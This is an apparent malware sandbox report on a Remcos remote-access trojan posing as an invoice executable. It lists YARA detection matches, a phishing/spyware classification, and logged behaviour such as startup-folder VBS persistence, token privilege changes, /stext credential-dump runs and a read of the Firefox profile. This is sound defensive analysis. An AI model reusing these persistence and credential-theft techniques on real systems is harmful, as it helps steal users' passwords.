                    Source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: Process Memory Space: turbinals.exe PID: 7720, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: turbinals.exe PID: 7744, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: turbinals.exe PID: 8108, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: turbinals.exe PID: 8124, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: turbinals.exe PID: 8144, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: turbinals.exe PID: 4984, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winEXE@20/14@1/2
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F3A06A GetLastError,FormatMessageW,0_2_00F3A06A
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F281CB AdjustTokenPrivileges,CloseHandle,0_2_00F281CB
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F287E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00F287E1
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D381CB AdjustTokenPrivileges,CloseHandle,2_2_00D381CB
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D387E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00D387E1
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F3B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00F3B3FB
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F4EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00F4EE0D
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F483BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00F483BB
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00ED4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00ED4E89
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeFile created: C:\Users\user\AppData\Local\acceptancyJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-R1T905
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeFile created: C:\Users\user\AppData\Local\Temp\aut5CD6.tmpJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs"
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSystem information queried: HandleInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: turbinals.exe, 00000003.00000002.3761912147.0000000006C50000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000005.00000002.1381350683.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: turbinals.exe, 00000003.00000002.3762011579.0000000006CD0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000003.00000002.3761912147.0000000006C50000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000005.00000002.1381350683.0000000000400000.00000040.80000000.00040000.00000000.sdmp, turbinals.exe, 00000006.00000002.1368239205.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: turbinals.exe, 00000003.00000002.3761912147.0000000006C50000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000005.00000002.1381350683.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: turbinals.exe, 00000003.00000002.3761912147.0000000006C50000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000005.00000002.1381350683.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: turbinals.exe, 00000003.00000002.3761912147.0000000006C50000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000005.00000002.1381350683.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: turbinals.exe, 00000003.00000002.3761912147.0000000006C50000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000005.00000002.1381350683.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: turbinals.exe, 00000005.00000003.1378980020.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000005.00000003.1380890752.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000005.00000002.1382093472.0000000002ABC000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000005.00000003.1378729995.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000005.00000003.1381105492.0000000002ABC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: turbinals.exe, 00000003.00000002.3761912147.0000000006C50000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000005.00000002.1381350683.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: z49FACTURA-0987678.exeReversingLabs: Detection: 26%
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeFile read: C:\Users\user\Desktop\z49FACTURA-0987678.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\z49FACTURA-0987678.exe "C:\Users\user\Desktop\z49FACTURA-0987678.exe"
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe "C:\Users\user\Desktop\z49FACTURA-0987678.exe"
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe "C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\ntpiwvxpqbhwumsvyl"
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\pvdaxohiejzjxsohpwwof"
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\apitxysksrrohzclyhjpqrrk"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe "C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe "C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe "C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe "C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe "C:\Users\user\Desktop\z49FACTURA-0987678.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe "C:\Users\user\AppData\Local\acceptancy\turbinals.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\ntpiwvxpqbhwumsvyl"Jump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\pvdaxohiejzjxsohpwwof"Jump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\apitxysksrrohzclyhjpqrrk"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe "C:\Users\user\AppData\Local\acceptancy\turbinals.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe "C:\Users\user\AppData\Local\acceptancy\turbinals.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe "C:\Users\user\AppData\Local\acceptancy\turbinals.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe "C:\Users\user\AppData\Local\acceptancy\turbinals.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: mswsock.dllJump to behavior
